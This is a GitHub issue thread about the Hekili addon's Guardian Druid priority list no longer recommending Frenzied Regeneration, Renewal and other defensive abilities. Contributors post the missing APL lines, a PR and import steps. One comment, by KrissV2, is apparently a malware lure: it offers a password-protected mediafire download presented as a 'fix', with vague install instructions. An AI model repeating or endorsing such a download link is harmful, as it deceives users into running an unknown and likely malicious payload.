### ISSUE TITLE
Guardian Druid doesn't recommend Frenzied Regeneration or Renewal anymore. 

### ISSUE THREAD

**Issue by ReallyMadCow** [Hekili/hekili#3618]
### Before You Begin

- [X] I confirm that I have downloaded the latest version of the addon.
- [X] I am not playing on a private server.
- [X] I checked for an [existing, open ticket](https://github.com/Hekili/hekili/labels/recommendation) for this issue and was not able to find one.
- [X] I edited the title of this issue (above) so that it describes the issue I am reporting.
- [X] I am reporting an issue with the default priority included with the specialization (imported or edited priorities are not supported).

### Describe the Issue

It never recommends healing skills any more when it used to before tww.

### How to Reproduce

go into dungeon, do a pull that's a bit too big, do rotation and watch your self die with never being recommended heal.

### Snapshot (Link)

https://pastebin.com/7FcqWZCp

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by davidmann4** [comment]
new apl: 
https://github.com/Hekili/hekili/blob/thewarwithin/TheWarWithin/Priorities/DruidGuardian.simc
Dragonflight apl: 
https://github.com/Hekili/hekili/blob/15a73aee426ff47ad1780a2058eea2706fbcca40/Dragonflight/APLs/DruidGuardian.simc

* Renewal is missing from current APL 
* survival_instincts is missing from current APL 
* regrowth is missing from current APL
* frenzied_regeneration is missing from current APL

since nothing changed with this spells I guess we could just copy the APL lines from the old simc to the new one.

```
actions+=/call_action_list,name=mitigation

# bear action list here ...

actions.mitigation=ironfur,if=tanking&!variable.if_build&incoming_damage_5s>ironfur_damage_threshold&buff.ironfur.remains<3*haste
actions.mitigation+=/regrowth,if=health.pct<65
actions.mitigation+=/renewal,if=health.pct<65
actions.mitigation+=/frenzied_regeneration,if=tanking&health.pct<65
actions.mitigation+=/barkskin,if=tanking&health.pct<75&incoming_damage_5s>0.1*health.max
actions.mitigation+=/survival_instincts,if=buff.survival_instincts.down&buff.barkskin.down&health.pct<60&incoming_damage_5s>0.25*health.max
```

the additional ironfur is also neat - but maybe we add a check to see if it is even lower then 4 stacks - since armor DR caps at 85% anyways.

**Comment by davidmann4** [comment]
(working on a pr: testing new apl)

**Comment by davidmann4** [comment]
I've created a PR for the new APL - @ReallyMadCow you can test the new APL aswell, if you want.

I already tested it and it works like in dragonflight. 


* open hekili
* create a new profile 
![image](https://github.com/user-attachments/assets/94c9fe34-f70d-481d-a46b-61e9b631d1b5)
* click the Action lists tab of that new profile
* paste the following APL:
https://raw.githubusercontent.com/Hekili/hekili/7b561a83f99bd85bcbd18a0f2a9174798b628a3d/TheWarWithin/Priorities/DruidGuardian.simc
* hit accept
* hit import
* go to summary tab
* click the checkbox "activate"

**Comment by ReallyMadCow** [comment]
yeah this seems to have done the trick thank you.

**Comment by syrifgit** [comment]
Looks like this will be fixed in the next update, thanks for contributing @davidmann4

**Comment by Rawr-kitteh** [comment]
When is the next update? While @davidmann4 rotation fixes the healing issue, it always recommends HOTW first thing, and disabling cooldowns doesn't work, it just keeps it enabled so HOTW is always first unless it's skipped, which is less than ideal.
